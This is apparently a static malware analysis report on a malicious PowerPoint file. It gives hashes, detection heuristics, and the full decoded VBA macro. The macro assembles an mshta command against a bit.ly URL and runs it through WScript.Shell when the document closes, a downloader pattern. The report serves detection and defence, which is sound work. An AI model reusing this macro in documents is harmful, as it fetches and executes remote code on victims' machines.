Malicious Office (OLE) / .PPT — malware analysis report

Static analysis result for SHA-256 dacf698a3a30d512…

MALICIOUS

Office (OLE) / .PPT

69.0 KB Created: 2020-07-01 02:00:23 Authoring application: Microsoft Office PowerPoint First seen: 2026-06-26
MD5: 5a61c694f8554e2c01b6d03ee0e71991 SHA-1: 7a338609d12e40188e0fcfc8cb727bf93c8795a9 SHA-256: dacf698a3a30d51249a98c1ca7e1d3bacb3c343dd3823eb9eb2c429e352d92ee
270 Risk Score

Heuristics 8

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    CreateObject("WScript.Shell").Exec main
  • VBA WScript mshta shortener downloader critical OLE_VBA_WSHELL_MSHTA_SHORTENER
    VBA auto-exec macro launches WScript.Shell.Exec with command text that resolves to mshta and a URL shortener target. This is a high-confidence downloader/dropper pattern, not an Office parser CVE.
    Matched line in script
    CreateObject("WScript.Shell").Exec main
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    CreateObject("WScript.Shell").Exec main
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub Auto_close()
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://%20%20@bit.ly/53em5i6ee07ethbkuysd Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 617 bytes
SHA-256: 2c8b2f0604a8cf08cb32f09f794add0fd9a6c2854da6c3ab4bb23156d401253f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "c1"
Function calc1()

calc1 = "m"

End Function

Attribute VB_Name = "c2"
Function calc2()

calc2 = "s"

End Function

Attribute VB_Name = "c3"
Function calc3()

calc3 = "h"

End Function


Attribute VB_Name = "c4"
Function calc4()

calc4 = "http://%20%20@bit.ly/53em5i6ee07ethbkuysd"

End Function


Attribute VB_Name = "c5"
Function main()

main = calc1 + calc2 + calc3 + "ta " + calc4
End Function

Attribute VB_Name = "m1"
Sub Auto_close()
calc0
End Sub

Attribute VB_Name = "m2"
Function calc0()

CreateObject("WScript.Shell").Exec main
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.